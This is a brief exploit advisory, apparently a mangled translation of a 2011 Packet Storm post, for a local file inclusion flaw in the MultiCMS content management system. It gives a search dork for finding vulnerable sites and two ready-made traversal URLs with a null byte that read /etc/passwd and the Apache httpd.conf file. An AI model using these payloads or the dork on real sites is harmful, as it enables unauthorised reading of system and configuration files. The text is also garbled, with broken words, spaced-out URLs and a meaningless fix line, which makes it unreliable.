MultiCMS is a flexible content management system that helps you build professional websites. The index. php file of MultiCMS has the local file inclusion vulnerability, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File isolation sion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcn à syst Region©M MultiCMS"
# Mail: defrontliner@whiteponny.com
[+] Poc:
~~~~~~~~~
# File:/Index. php? Lng = [LFI]
# XPL: http://localhost.com/?path=/index.php? Lng = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd % 00
Http://localhost.com/?path=/index.php? Lng = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/httpd/conf/httpd. conf % 00
[+] Reference:
~~~~~~~~~
Http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
Fix: Please participate in vulnerability security measures on this site